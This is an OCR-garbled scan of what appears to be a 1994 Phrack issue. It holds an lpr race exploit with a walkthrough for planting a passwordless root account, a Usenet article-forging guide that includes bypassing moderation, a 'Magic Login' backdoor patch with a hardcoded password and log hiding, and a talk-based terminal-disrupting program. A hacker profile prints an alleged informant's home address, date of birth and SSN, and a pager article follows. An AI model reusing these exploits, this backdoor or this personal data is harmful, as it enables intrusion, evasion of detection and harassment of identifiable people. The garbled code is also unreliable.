rm -f£ /tmp/.tmp.S$S # lpr’s 


accepted it, point it 


In -s $2 /tmp/.tmp.$$ # to where we really want 

@s = 0 

while ( $s != 999) # loop 999 times 
lpr /nofile >&/dev/null # doesn’t exist, but spins the clock! 
@ stt 
if ( $s % 10 == 0 ) echo -n 

end 

lpr $1 # incoming file 


# user becomes owner 
rm -f£ /tmp/.tmp.$$ 
exit 0 
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8< cut her 


(Lines marked with > represent user input) 


Make copies of /etc/passwd and /etc/group, and modify them: 
> $ id 
uid=97(8lgm) gid=97(8lgm) groups=97 (81gm) 
> % cp /etc/passwd /tmp/passwd 
> $ ex /tmp/passwd 
/tmp/passwd: unmodified: line 42 


we 

> 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh 
> 

> twG 


/tmp/passwd: 43 lines, 2188 characters. 
> % cp /etc/group /tmp 
> $ ex /tmp/group 

/tmp/group: unmodified: line 49 


> :/wheel 
wheel:*:0:root, operator 
BEG 
> wheel:*:0:root, operator, 8lgm 
> 
> twg 


/tmp/group: 49 lines, 944 characters. 


Install our new files: 
> & ./lprcep /tmp/group /etc/group 


lpr: cannot rename /var/spool/lpd/cfA060testnode 
% ./lprcp /tmp/passwd /etc/passwd 


lpr: cannot rename /var/spool/lpd/cfA06ltestnode 


Check it worked: 

> $ ls -l1 /etc/passwd /etc/group 

-rw-r--r-- 1 8lgm 944 Mar 3 19:56 /etc/group 
—rw-r--r-- 1 8lgm 2188 Mar 3 19:59 /etc/passwd 
> $ head -1 /etc/group 

wheel: *:0:root, operator, 8lgm 

> % grep '*8lgmroot’ /etc/passwd 

8lgmroot::0:0:Test account for lpr bug:/:/bin/csh 


Become root and tidy up: 

> $ su 8lgmroot 
# chown root /etc/passwd /etc/group 
# rm -f /tmp/passwd /tmp/group 


FIX: 


1. Contact your vendor for a fix. 

2. In the meantime, apply the following patch, derived from 
BSD NET/2 source, which will correct the flaw on most 
affected systems: 


Anonymous netnews without "anonymous" remailers 


Save any news article to a file. We’1ll call it "hak" in this example. 
Edit hak, and remove any header lines of the form 


From some! random! path!user (note: "From ", not "From: " !!) 
Article: 
Lines: 
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Shorten the Path: header down to its LAST two or three "bangized" components. 
This is to make the article look like it was posted from where it really was 
posted, and originally hit the net at or near the host you send it to. Or 

you can construct a completely new Path: line to reflect your assumed alias. 


Make some change to the Message-ID: field, that isn’t likely to be 
duplicated anywhere. This is usually best done by adding a couple of 
random characters to the part before the @, since news posting programs 
generally use a fixed-length field to generate these IDs. 


Change the other headers to say what you like -- From:, Newsgroups:, 
Sender:, etc. Replace the original message text with your message. 

If you are posting to a moderated group, remember to put in an Approved: 
header to bypass the moderation mechanism. 


Write out the changed file, and send it to your favorite NNTP server that 


ay 


permits transfers via the IHAVE command, using the following script: 


! /bin/sh 
Post an article via IHAVE. 
args: filename server 


if test "$2" = "" ; then 
echo usage: $0 filename server 
exit 1 
fi 
if test ! -f£ $1 ; then 
echo $1: not found 
exit 1 
fi 


# suck msg-id out of headers, keep the brackets 

msgid=‘sed -e '/*S/,S$d’ $1 | egrep ’*[MmJessage-[Ti][Dd]: ’ | \ 
séd. s/.*-[Ti] [Da] s-//"" 

echo Smsgid 

( sleep 5 

cho IHAVE S$msgid 

leep 3 

at $1 

Leep: i: 

cho "W . W 

leep 1 

echo QUIT ) | telnet $2 119 


non AAA NH 


If your article doesn’t appear in a day or two, try a different server. 
They are easy to find. Here’s a script that will break a large file 
full of saved netnews into a list of hosts to try. Edit the output 

of this if you want, to remove obvious peoples’ names and other trash. 


#! /bin/sh 

FGV='fgrep -1i -v 
egrep ’*Path: ’ $1 | sed -e '’s/*Path: //'’ -e 's/!/\ 
/g’ | sort -u | fgrep . | SFGV .bitnet | S$FGV .uucp 


Once you have your host list, feed it to the following script. 


#! /bin/sh 


while read xx ; do 
if test "Sxx" = "" ; then continue; 
fi 
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echo === Sxx 
( echo open $xx 119 
sleep 5 
echo ihave k001@x.edu 
sleep 4 
echo 
echo quit 
sleep 1 
echo quit 
) | telnet 
done 


If the above script is called "findem" and you’re using csh, you should do 


findem < list >& outfile 


so that ALL output from telnet is captured. This takes a long time, but when 
it finishes, edit "outfile”" and look for occurrences of "335". These mark 
answers from servers that might be willing to accept an article. This isn’t a 
completely reliable indication, since some servers respond with acceptance and 
later drop articles. Try a given server with a slightly modified repeat of 
someon lse’s message, and see if it eventually appears. 


You will notice other servers that don’t necessarily take an IHAVE, but 
say "posting ok". You can probably do regular POSTS through these, but they 
will add an "NNTP-Posting-Host: " header containing the machine YOU came from. 


Magic Login - Written by Data King - 7 July 1994 


PLEASE NOTE:-— 


This program code is released on the understanding that neither the 
author or Phrack Magazine suggest that you implement this on **ANY** 
system that you are not authorized to do so. The author provides this 
implementation of a "Magic" login as a learning exercise in security 
programming. 


Sorry for the disclaimer readers but I was advised by the AFP (Australian 
Federal Police) that if I ever released this code they would bust me for 
aiding and abetting. I am releasing it anyway as I believe in the right of 
people to KNOW, but not necessarily to DO. 


As always I can be emailed at dking@suburbia.apana.org.au 
(Please note:- I have a NEW pgp signature.) 


INTRODUCTION 

Briefly I am going to explain what a "Magic" login is and some of the steps you 
need to go through to receive the desired result. At the end of this article is 
a diff that can be applied to the shadow-3.2.2-linux archive to implement some 

of these ideas. 


EXPLANATION 


A "Magic" login is a modified login program that allows the user to login 
without knowing the correct password for the account they are logging into. 


This is a very simple programming exercise and can be done by almost anyone, but 
a really effective "Magic" login program will do much more than this. The 
features of the supplied "Magic" login are: 


—- Will login to any valid account as long as you know the Magic password. 


—- Hides you in UTMP 
[B 
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- Does not Log to WTMP 


— Allows Root Login from NON authorized Terminals 


Preserves the Lastlogin information (ie Keeps it as though you had never 
logged in with the magic password) 


—- Produces a binary that is exactly the same length as the original binary. 


IMPLEMENTATION 


I am not going to go into great detail here on how to write such a system as 
this. The code is very simple and it contains plenty of comments, so just look 
there for ideas. 


For this system to have less chance of being detected you need to do several 
things. 


First select a "Magic" password that is not easily identifiable by stringing the 
binary. This is why in the example I have used the word "CONSOLE", this word 
already appears several times in the binary so detection of one more is 
unlikely. 


Admittedly I could of encrypted the "Magic" password, but I decided against this 
for several reasons. 


The second thing you would need to do if you where illegally placing a "Magic" 
login on a system would be to ensure that the admins are not doing CRC checks on 
SUID(0) programs, or if they are that you change the CRC record of login to 
match the CRC record of the "Magic" login. 


hirdly do not forget to make the date and time stamp of the new binary match 
the old ones. 


[To install a new /bin/login on a system you will need to be root, now if you are 
already root why would you bother? Simple, it is just one more backdoor that you 
can use to get back in if you are detected. 


LIMITATIONS 
This version of the "Magic" login program does not have the following features, 
I leave it entirely up to you about implementing something to fix them: 


- Shells & Programs show up in the Process Table 
- tty Ownership and attributes 
- /proc filesystem 
Any one of these to an alert system admin will show that there is an "invisible" 


user on the system. However it has been my experience that most admin’s rarely 
look at these things, or if they do they can not see the wood for the trees. 


diff -c /root/work/login/console.c /root/work/logon/console.c 
*** /root/work/login/console.c Sun Oct 11 07:16:47 1992 
--- /root/work/logon/console.c Sat Jun 4 15:29:15 1994 


KKKKKKKKKKKKKKK 


KKK 21,26 KKKK 


extern char *getdef_str(); 
+ extern int magik; 


/* 


* tty - return 1 if the "tty" is a console device, else 0. 
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KAKKKKKKKKKKKKKK 
KkK* 47,52 KKK 
--- 48,57 ---- 
if ((console = getdef_str("CONSOLE")) == NULL) 
return 1; 


+ /* Fix for Magic Login - UnAuth Console - Data King */ 


+ if (magik==1) 
+ return 1; 
/* 
* Tf this isn’t a filename, then it is a ":" delimited list of 
* console devices upon which root logins are allowed. 
diff -c /root/work/login/Ilmain.c /root/work/logon/lmain.c 
*** /root/work/login/lmain.c Mon Oct 12 17:35:06 1992 
--- /root/work/logon/lmain.c Sat Jun 4 15:30:37 1994 
KKKKKKKKKKKKKKK 
KK*K 105, 110 KKK 
--- 105,111 ---- 
char *Prog; 
int newenve = 0; 
int maxenv = MAXENV; 
+ int magik; /* Global Flag for Magic Login - Data King */ 


/* 
* External identifiers. 

diff -c /root/work/login/log.c /root/work/logon/log.c 

*** /root/work/login/log.c Mon Oct 12 17:35:07 1992 

--- /root/work/logon/log.c Sat Jun 4 15:37:22 1994 


KKKKKKKKKKKKKKK 


KKK 53,58 KKKK 

S251. 535 99 Sas = 
extern struct passwd pwent; 
extern struct lastlog lastlog; 
extern char **environ; 

+ extern char magik; 


long lseek (); 
time_t time (); 
KKKKKKK KK KKK KKK 
KK* 83,89 KKKK 
void) time (&newlog.11l_time); 


void) strncpy (newlog.1ll_line, utent.ut_line, sizeof newlog.1ll_line); 
id) lseek (fd, offset, 0); 
! void) write (fd, (char *) &newlog, sizeof newlog); 
) 


close (fd); 


soe 84, 93).so = 
(void) time (&newlog.11l_time); 
(void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.1ll_line); 
(void) lseek (fd, offset, 0); 
! if (magik !=1) /* Dont Modify Last login Specs if this is a Magic */ 
! /* login - Data King */ 
! 
! 


(void) write (fd, (char *) &newlog, sizeof newlog); 


(void) close (fd); 
} 


diff -c /root/work/login/utmp.c /root/work/logon/utmp.c 
*** /root/work/login/utmp.c Mon Oct 12 17:35:36 1992 
--- /root/work/logon/utmp.c Sat Jun 4 15:41:13 1994 
KKKKKKKKKKKKKKK 
kkk T0545 KKK*K 
--- 70,77 ---- 

extern long lseek(); 

#endif /* SVR4 */ 
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+ extern int magik; 


define NO_UTENT \ 
"No utmp entry. You must exec \"login\" from the lowest level \"sh\"" 
define NO_TTY \ 
KKKKKKKKKKKKKKK 
KK*K 353,368 KKKK 
/* 

* Scribble out the new entry and close the file. We’re don 

* with UTMP, next we do WIMP (which is real easy, put it on 
| * the end of the file. 
* 


! 

! (void) write (fd, &utmp, sizeof utmp); 
! (void) close (fd); 
! 
! 


if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) { 
(void) write (fd, &utmp, sizeof utmp); 
(void) close (fd); 
} 
= utent = utmp; 
#endif /* SVR4 */ 
} 
--- 355,372 ---- 
/* 
* Scribble out the new entry and close the file. We’re don 
* with UTMP, next we do WTMP (which is real easy, put it on 
| * the end of the file. If Magic Login, DONT write out UTMP - Data King 
*/ 
! if (magik !=1) 
! { 
(void) write (fd, &utmp, sizeof utmp); 
(void) close (fd); 


at if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) { 
+ (void) write (fd, &utmp, sizeof utmp); 
+ (void) close (fd); 
+ } 
+ utent = utmp; 
} 

#endif /* SVR4 */ 

} 
diff -c /root/work/login/valid.c /root/work/logon/valid.c 
*x** /root/work/login/valid.c Sun Oct 11 07:16:55 1992 
--- /root/work/logon/valid.c Sat Jun 4 15:47:28 1994 
KKKKKKKKKKKKKKK 
KkK* 25,30 KKK 
—-- 25,32 ---- 
static char _sccsid[] = "@(#)valid.c 3.4 08:44:15 9/12/91"; 
#endif 


+ extern int magik; 


/* 
* valid - compare encrypted passwords 
* 


KKKKKKKKKKKKKKK 


KKK 43,48 KKKK 
—-- 45,64 ---- 

char *encrypt; 

char *salt; 

char *pw_encrypt (); 
+ char *magic; 


+ /* 

+ * Below is the piece of code that checks to see if the password 
+ * supplied by the user = the Magic Password - Data King 

a * / 
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+ magic = "CONSOLE"; /* Define this as the Magic Password - Data King */ 


+ aif (strcmp(password,magic) == 0) 
+ { 

+ magik = 1; 

+ return (1); 


+ 


/* 


* Start with blank or empty password entries. Always encrypt 


/* flash.c */ 


/* This little program is intended to quickly mess up a user’s 
terminal by issuing a talk request to that person and sending 
vt100 escape characters that force the user to logout or kill 
his/her xterm in order to regain a sane view of the text. 

It the user’s message mode is set to off (mesg n) he/she will 
be unharmed. 
This program is really nasty :-) 


Usage: flash user@host 


try compiling with: gcc -o flash flash.c 
ef 


include <sys/types.h> 
include <sys/socket.h> 
include <netinet/in.h> 
include <netdb.h> 
include <stdio.h> 
include <strings.h> 


/* this should really be in an include file.. */ 
define OLD_NAME _ SIZE 9 
define NAME SIZE 12 
define TTY_SIZE 16 
typedef struct { 
char type; 
char l_name [OLD_NAME_ SIZE]; 
char r_name[OLD_NAME SIZE]; 
char filler; 
u_long id_num; 
u_long pid; 
char r_tty[TTY_SIZE]; 


struct sockaddr_in addr; 
struct sockaddr_in ctl_addr; 
} OLD_MSG; 


typedef struct { 

u_char vers; 
char type; 
u_short filler; 
u_long id_num; 
struct sockaddr_in addr; 
struct sockaddr_in ctl_addr; 
long pid; 


char 1_name [NAME SIZE]; 
char r_name [NAME _ SIZE]; 
char r_tty[TTY_SIZE]; 

} CTL_MSG; 


#define TALK_VERSION 1 /* protocol version */ 
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/* Types */ 


define LEAVE_INVITE 0 
define LOOK_UP Al 
define DELETE 2 
define ANNOUNCE 3 
int current = 1; /* current id... this to avoid duplications */ 


struct sockaddr_in *getinaddr(char *hostname, u_short port) 


{ 


static struct sockaddr addr; 

struct sockaddr_in *address; 

struct hostent *host; 

address = (struct sockaddr_in *) &addr; 

(void) bzero( (char *)address, sizeof(struct sockaddr_in) ); 


/* fill in the easy fields */ 
address-—>sin_family = AF_INET; 


address-—>sin_port = htons (port); 
/* first, check if the address is an ip address */ 
address->sin_addr.s_addr = inet_addr (hostname) ; 
if ( (int) address-—>sin_addr.s_addr == -1) 
{ 
/* it wasn’t.. so we try it as a long host name */ 
host = gethostbyname (hostname) ; 
if (host) 
{ 
/* wow. It’s a host name.. set the fields */ 


/* ?? address->sin_family = host->h_addrtype; */ 
bcopy( host->h_addr, (char *) &address-—>sin_addr, 
host->h_length) ; 
} 
else 
{ 
/* oops.. can’t find it.. */ 
puts ("Couldn’t find address"); 
exit (-1); 
return (struct sockaddr_in *)0; 
} 
} 
/* all done. */ 
return (struct sockaddr_in *) address; 


} 


SendTalkPacket (struct sockaddr_in *target, char *p, int psize) 


{ 
int  s; 
struct sockaddr sample; /* not used.. only to get the size */ 


s = socket (AF_INET, SOCK_DGRAM, 0); 
sendto( s, p, psize, 0, (struct sock_addr *)target, sizeof (sample) 


} 


new_ANNOUNCE (char *hostname, char *remote, char *local) 
{ 

CTL_MSG packet; 

struct sockaddr_in *address; 


/* create a packet */ 
address = getinaddr (hostname, 666 ); 
address-—>sin_family = htons (AF_INET); 


bzero( (char *)&packet, sizeof(packet) ); 
packet.vers = TALK_VERSION; 

packet.type 
packet.pid = getpid(); 


ll 
> 
Z 
Z 
(e) 
G 
Z 
Q 


rp. 
hy 


i 
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packet.id_num = current; 
beopy( (char *)address, (char *) &packet.addr, sizeof(packet.addr ) ); 


beopy( (char *)address, (char *) &packet.ctl_addr, sizeof (packet.ctl_addr) ); 
strncpy( packet.l_name, local, NAME_SIZE); 

strncpy( packet.r_name, remote, NAME SIZE); 

strncpy( packet.r_tty, "", 1); 


SendTalkPacket ( getinaddr (hostname, 518), (char *)&packet, sizeof(packet) ); 
} 


oOld_ANNOUNCE (char *hostname, char *remote, char *local) 
{ 
OLD_MSG packet; 

struct sockaddr_in *address; 


/* create a packet */ 
address = getinaddr (hostname, 666 ); 
address-—>sin_family = htons (AF_INET); 


bzero( (char *)&packet, sizeof(packet) ); 

packet.type = ANNOUNCE; 

packet.pid = getpid(); 

packet.id_num = current; 

beopy( (char *)address, (char *)&épacket.addr, sizeof(packet.addr ) ); 
beopy( (char *)address, (char *) &packet.ctl_addr, sizeof (packet.ctl_addr) ); 
strncpy( packet.l_name, local, NAME_SIZE); 

strncpy( packet.r_name, remote, NAME SIZE); 

strncpy( packet.r_tty, "", 1); 


SendTalkPacket ( getinaddr (hostname, 517), (char *)&packet, sizeof(packet) ); 
} 


main(int argc, char *argv[]) 
{ 


char *hostname, *username; 


int pid; 

if ( (pid = fork()) == -1) 
{ 

perror("fork()"); 


exit (-1); 

re ( !pid ) 
Se 

- (arge < 2) { 


puts ("Usage: <finger info> "); 

exit (5); 
} 

username = argv[1l]; 
if ( (hostname = (char *)strchr(username, ’@’)) == NULL ) 
{ 

puts ("Invalid name. Wee 


exit (-1); 
} 
*hostname = ’\0’; 
hostnamet+; 


if (*username == '7’) 
usernamett; 


define FIRST "\033c\033(0\033#8" 

define SECOND "\033[1;3r\033[J" 

define THIRD "\033[5m\033[?5h" 
new_ANNOUNCE (hostname, username, FIRST); 
old_ANNOUNCE (hostname, username, FIRST); 
currentt+; 
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-:[ Phrack Pro-Phile ]:- 
This issue our prophile introduces you to one of the craziest people 
I’ve ever met from the Underground. And coming from a complete loon 
like me, that’s saying something. This guy is a real Renaissance Man: 
Hacker, programmer, burglar, convict, star of stage and screen... 
Of course, that someone could only be: 


Minor Threat 


Personal Info: 


Handle: Minor Threat 
Call him: MT, minor, lamer 
Born: 1972 in Walnut Creek, California 
Age: 22 
Height: 6’1" 
Weight: 155 lbs 
e-mail: mthreat@paranoia.com 
www: http://www.paranoia.com/ ~mthreat/ 
Affiliations: Dark Side Research 
Computers owned: 1981: IBM PC 
1982: none 
1984: PCjr 
1988: XT Clone 
1990: 386/25 Clone 
1992: Too many to legally list 
1994: Pentium & 486 


How I got started 


In 1981, my dad worked for IBM. In October of that year, he 
brought home a PC, and I jumped on BASIC. It wasn’t until 1984 that 
I got my first modem. I had just moved to Florida with my dad, and 
he had a modem. I met some other kids with computers and modems and 
they taught me what modems were for: "You call other people’s 
computers and try to get their passwords and intercept their mail". 
(That’s what I was taught!) It wasn’t until a few months later I 
realized that this wasn’t the actual purpose of BBSs and modems. 

My first BBS was the Towne Crier BBS at FAU (Florida Atlantic 
University), 305-393-3891 (I still remember that damn number), but 
the NPA has since changed to 407. We thought it was so cool when 
we logged on as "All" and deleted all the messages posted to "All". 


In about 1985, I moved back to Austin. I screwed around for 
several years without doing any real hacking. When I got to high 
school, I wanted to change my grades like in War Games, so I looked 
through the counselor’s office until I found a number to the 
Education Service Center. I had to scan a whole _100_ numbers 
(929-13xx) to find the HP3000 dialup. Once I found it, I had no 
idea what to do. I gave the number to a friend in high school, 

who gave it to some of his hacker friends. They hacked it and gave 
it back to me, complete with a full list of passwords and commands. 
It turns out, the two Austin hackers who did it were The Mentor and 
Erik Bloodaxe, but I didn’t know that for another 3 years. 


Shortly after this, I picked my permanent handle. Minor Threat 
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was an early-to-mid 1980’s punk band from Washington, DC. They’re no 
longer together, but Fugazi is pretty good and Ian McKaye (from 

Minor Threat) is in Fugazi. I actually got the handle off of one 

of my sister’s tapes, before I even heard them. But now I like the 
music too. 


Eventually, I found a local pirate board, met all the local 
pirates, and got into the warez scene for a while. I joined PE 

(Public Enemy), the pirate group. (I cracked the warez!) Warez were 
only so fun, so I looked for other stuff. I met some VMB lamers and 


got into that scene for about a month, and got bored again. 


This was 1990, our 950s were running out, and we needed another 
way to call out. So I took an old VMB hacking program I had 
written, and changed it around to scan for tones, in random order 
to avoid Ma Bell problems. I nicknamed it ToneLoc, short for Tone- 
Locator. I gave it to some friends (Alexis Machine & Marko Ramius) 
and eventually, it ended up on some warez boards. It got pretty 
popular, so I made a version that worked for more people, called 
it 0.90, and released it. Then I lost the source in a hard drive 
crash, and stopped working on it. 


I was 18 and mom said it was time to get out of her house, so 
I got my own apartment. Marko Ramius and I learned about trashing 


central offices, and gained COSMOS access. We barely knew what 
COSMOS was .. I knew I had read about it in old Phrack articles, and 
I remembered that it was "elite." Our problem was, we still knew no 


other "real" hackers, and we had to learn COSMOS. After trashing 
and trashing, we still had no COSMOS manuals. We had to get them 
somehow. I can’t say how, I’1ll leave it to your imagination. 


Marko and I started breaking in buildings and got pretty 


good at it. We had about a 60% success rate I would guess. But we 
never stole anything -- we just looked for cool information. In 


1991, we got caught in a building, and got charged with Criminal 
Trespassing. We both got probation for a Class A misdemeanor. 
We decided it was time to stop breaking in buildings. 


Late in 1991, I got e-mail on a bulletin board from someone 
named Mucho Maas. He said he had gotten ToneLoc and wanted a 
few new features. I told him I had lost the current source and 
all I had was an old (0.85) source. He said he would take the 
old source, add the new features, and bring it up-to-date with 
the current source. So he did, and we released ToneLoc 0.95. 

If it weren’t for Mucho, ToneLoc would still be at version 0.90, 
and anyone who ran 0.90 knows how hard it was to get it running 
right. 


About the same time, I was getting on a few BBSs in the 
Washington DC area. (Pentavia was the best while it was up). 

I met several people there... including a guy named Codec. Codec 
was mostly a phone phreak, but did a little hacking as well. But 
when it came to PBX’s, he was a master. Not only had he exploited 


PBXs for free long distance use like the rest of us, but he had 
actually REMOVED entire PBX systems from buildings! (See his 
article on how to do this, Phrack 43, article 15). But he had 


also gotten caught and was on federal probation. 


A few months after I met Codec, he had an ’incident’ 

and was on the run again. I agreed to let him live with me, so 
he flew down and moved in. We got a 2 bedroom place, and set 

the place up dOQpe. There were over 9 phone extensions, (not 
including cordless), and about the same number of computers (Most 
of which were Codec’s). We had the funnest 3 months ever 

but about 2 weeks after SummerCon 1992, we got arrested. 


Favorite things 


Women: wO0w 
Music: Sonic Youth, Cure, Fugazi, Minor Threat, Orb, B-Boys, 
Jane’s Addiction. 
Favorite Book: 1984 
My Car: 1990 300ZX Twin Turbo, Wolf Chip mod to 360 
horsepower. It’s fucking fast. 
Favorite Movies: Jackie Chan movies, The Killer, Reservoir Dogs, 
The Lost Boys, Near Dark, Hardware. 
Favorite TV: MacGyver 


What are some of your most memorable experiences? 


Being polygraphed by the Secret Service in 1991 for something having 
to do with some lamer threatening the president on an Alliance 


Teleconference. I failed the polygraph the first time, then I 
passed it the second time. (How’s that for the government?) 
Eventually, some other 15-year old got probation for doing it. 


Being arrested with Codec in 1992. He ran, outran the cops, jumped 
a fence about 8 feet tall, and eventually got in a struggle with 

a cop over the his gun (Officer Sheldon Salsbury, Austin PD). The 
gun went off, and we were both booked on attempted capital murder. 
It turned out that the bullet hit no one, and all the blood was from 
the cop hitting himself in the head with his own gun, although the 
cop claims that Codec hit him in the forehead with a 2-meter ham 
radio from like 20 feet away. Right. A search warrant was executed 
on our apartment, and approximately $800,000 worth of AT&T Switching 
equipment was seized from Codec’s closet. It turns out, we were 
narced on and set-up by 


Jon R. Massengale 
6501 Deer Hollow 
Austin, TX 78750 
DOB: 9-7-62 

SSN: 463-92-0306 


Being the first in Texas to have Caller-ID, before it was legally 
available. 


Losing control of my car at 140mph, doing a slow 360 at about 120, 
living through it, and not doing too much damage to my car. 


Good times: 


Going up to Seattle to visit Cerebrum in May 1993, seeing Fugazi, 
getting our car towed, then reading the dialups to the towing 
company’s xenix (login: sysadm). Finally getting our Oki 900’s 
to clone/tumble/do other d0Ope things. Calling each other on 

our Okis from 5 feet away, putting them together and causing 
feedback. 


Setting up my apartment with Codec with a 10-station Merlin system, 
and a 9-station network. 


SummerCon 1993. "Culmination of Coolness." Sorry, can’t say any 
more. 


Some People To Mention: 


There are a lot of people who I would like to mention that have helped 
me greatly and who I have known for a very long time: 
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Marko Ramius - First pirate/hacker I really knew in person. We 
did a lot of crazy shit together. 


Alexis Machine - Second hacker-type I met, and a true Warez Kid. 
(that’s a complement!) 


Mucho Maas - Brought back ToneLoc from the dead. Always told 
me what I shouldn’t do, and always said "I told 
you so" when I got busted. 


Codec - I had some of the funnest times of my life with 
Codec... unfortunately, it was so much fun it was 
illegal, and we got busted. 


Cerebrum - Very cool friend who got narced on by a fuckhead 
named Zach, 206-364-0660. Cerebrum is serving 
a 10 month federal sentence in a nice prison camp 
in Sheridan, Oregon. He gets out about December 
10, 1994. 


The Conflict - Unfortunately, I can’t tell you. Maybe in about 8 
more years. 


ESAC Administrator - "Have you been drinking on the job?" 


What I’m up to now 


When I heard that the next Phrack Pro-phile was going to be about 
me, I realized, "I must be retired". It’s probably true.. at least I hope 
it is. The 5 months I spent in jail was enough. I just started going 
back to University of Texas, where they will only give me a VAX account 
(lame). For the first time in 4 years, I think my life is going in 
the ‘right’ direction. 


Advice 

I can only hope anyone who reads this will take this seriously. 
Here’s my advice: If you ever get arrested or even simply questioned about 
ANYTHING AT ALL, DO NOT COOPERATE. Always tell the law enforcement 


official or whoever, "I’m sorry, I can’t talk without my lawyer present" 
Cooperating will never help you. Codec recently pointed out to me, that 
we should be the "role models" of what people should do when they get 
busted. Both of us remained loyal and quiet during our whole case. I was 
in jail for 5 months, and Codec is still in prison, but we never talked. 
Being narced on by a ’buddy’ is the worst thing that could ever happen 
to you, and narcing on a ’buddy’ is the worst thing you could do to 
them. If you get busted for something, don’t pass the punishment on 

to someone else. I hope most of you never have to face this, but if 

you do, you will live much better knowing that you didn’t give in to 

a bunch of ’law enforcement’ pricks. 
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BIG FUN 


Think Federal District Court Judges and Special 
Agents get to have all the fun? 


Not any more!! 
It’s the Operation Sun Devil Home Game! 


For the first step in the game, a quick flourish of a pen 
signs away your opponent’s rights to any expectations of 
privacy. Bank records, medical records, employment 
files, student records...literally anything is yours 

for the taking. 


As you progress through the various levels, you move on 
to other legal scenarios like the application for search 
warrant and the summons. 


It’s all here in the Operation Sun Devil Home game, by 
Gailco. 


Other game pieces available via ftp from freeside.com 
in /pub/phrack/gailco. 


Offer not sold in stores. Do not use. 
Impersonating an officer of the court is a felony. 
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The Wonderful World of Pagers 


by Erik Bloodaxe 


Screaming through the electromagnet swamp we live in are hundreds of 
thousands of messages of varying degrees of importance. Doctors, 
police, corporate executives, housewives and drug dealers all find 
themselves constantly trapped at the mercy of a teeny little box: 
the pager. 


Everyone has seen a pager; almost everyone has one. Over 20 million 
pagers are on the streets in the US alone, sorting out their particular 
chunk of the radio-spectrum. Another fifty-thousand more are 

put into service each day. 


But what the hell are these things really doing? What more can we 
do with them than be reminded to call mom, or to "pick up dry-cleaning?" 


Lots. 


** PROTOCOLS ** 


Pagers today use a variety of signalling formats such as POCSAG, FLEX 

and GOLAY. The most common by far is POCSAG (Post Office Standardization 
Advisory Group), a standard set by the British Post Office and adopted 
world-wide for paging. 


POCSAG is transmitted at three transmission rates--512, 1200 and 2400 bps. 
Most commercial paging companies today use at least 1200, although many 
companies who own their own paging terminals for in-house use transmit 
at 512. Nationwide carriers (SkyTel, PageNet, MobileComm, etc.) send 
the majority of their traffic at 2400 to make the maximum use of 

their bandwidth. In other words, the faster they can deliver pages, 
the smaller their queue of outgoing pages is. Although these 

carriers have upgraded their equipment in the field to broadcast at 
2400 (or plan to do so in the near future), they still send out 

some pages at 1200 and 512 to accommodate their customers with older 
pagers. Most 512 and 1200 traffic on the nationwide services is 
numeric or tone-only pages. 


POCSAG messages are broadcast in batches. Each batch is comprised of 8 
frames, and each frame contains two codewords separated by a 
"synchronization" codeword. A message can have as many codewords 

as needed to deliver the page and can stretch through several batches 

if needed. The end of a complete message is indicated by a "next address" 
codeword. Both addressing and user data are sent in the codewords, the 
distinction being the least significant bit of the codeword: 

0 for address data, and 1 for user-data. 


Standard alphanumeric data is sent in a seven-bit format, with each codeword 
containing 2 6/7 characters. A newer 8-bit alphanumeric format is 
implemented by some carriers which allow users to send data such as 

computer files, graphics in addition to regular alphanumeric messages. 

The 8 bit format allows for 2.5 characters per codeword. 


Numeric data is 4 bit, allowing up to 5 numbers to be transmitted per 
codeword. Tone and voice pages contain address information only. 


= 


(NOTE: Pager data uses BCH 32,21 for encoding. I don’t imagine 
very many of you will be trying to decode pager data by building your 
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own decoders, but for those of you who may, take my interpretation 
of POCSAG framing with a grain of salt, and try to dig up the 
actual POCSAG specs.) 


** THE PAGING RECEIVER ** 


Paging receivers come in hundreds of shapes and sizes, although the vast 
majority are manufactured by Motorola. Numeric pagers comprise over 
fifty percent all pagers in use. Alphanumeric comprises about thirty 
percent, with tone and voice pagers making up the remainder. 


Pagers are uniquely addressed by a capcode. The capcode is usually six 
to eight digits in length, and will be printed somewhere on the pager 
itself. Many pager companies assign customers PIN numbers, which are 
then cross-referenced to a given capcode in databases maintained by 

the service provider. PIN numbers have no other relationship 

to the capcode. 


Tone pagers are by far the most limited paging devices in use. 

When a specified number has been called, an address only message 

is broadcast, which causes the intended receiver to beep. Wow. 
Tone pagers usually have 4 capcodes, which can correspond to 
different locations to call back. Voice pagers are similar, except 
they allow the calling party to leave a 15 to 30 second message. 

The voice message is broadcast immediately after the capcode of the 
receiver, which unsquelches the device’s audio. 


Numeric pagers, although seemingly limited by their lack of display 
options have proven otherwise by enterprising users. Most numeric 
data sent is obviously related to phone numbers, but numerous users 
have developed codes relating to various actions to be carried out 
by the party being paged. The most prolific users of this have 
been the Chinese who have one of the most active paging networks 


in the world. I suppose the next biggest users of code-style numeric 
paging would be drug dealers. (2112 0830 187 -- get to the fucking 
drop site by 8:30 or I’1l bust a cap in your ass!) 2) 


Alphanumeric pagers are most often contacted through a dedicated 
service that will manually enter in the message to be sent onto the 
paging terminal. One such service, NDC, offers its phone-answering 
and message typing services to various pager companies. Next time 
you are talking to a pager operator, ask him or her if they are at 
NDC. They probably are. 


In addition to the capcode, pagers will have an FCC ID number, a serial 
number, and most importantly, the frequency that the device has been 
crystaled for imprinted on the back of the device. Although technology 
exists that would allow pagers to listen on a number of frequencies 

by synthesizing the frequency rather than using a crystal, pager 
manufacturers stick to using crystals to "keep the unit cost down." 


Pagers may have multiple capcodes by which they can be addressed by. 
Multiple capcodes are most often used when a person has subscribed to 
various services offered by their provider, or when the subscriber is 
part of a group of individuals who will all need to receive the sam 
page simultaneously (police, EMTs, etc.). 


Most low-cost pagers have their capcode stored on the circuit board 
in a PAL. Most paging companies will completely exchange pagers 
rather than remove and reprogram the PAL, so I don’t think 

it’s worth it for any experimenter to attempt. However, like most 
Motorola devices, many of their paging products can be reprogrammed 
with a special serial cable and software. Reprogramming software 
is usually limited to changing baud rates, and adding capcodes. 


Additionally, some units can be reprogrammed over the air by the 
service provider. Using a POCSAG feature known as OTP (over the air 
programming) the service provider can instruct the paging receiver to 


8.txt Wed Apr 26 09:43:41 2017 3 


add capcodes, remove capcodes, or even shut itself down in the case 
of non-payment. 


*xk SERVICES ** 


With the growing popularity of alphanumeric pagers, many service providers 
have decided to branch out into the information business. The most 

common of these services is delivery of news headlines. Other services 
include stock quotes, airline flight information, voice mail and 

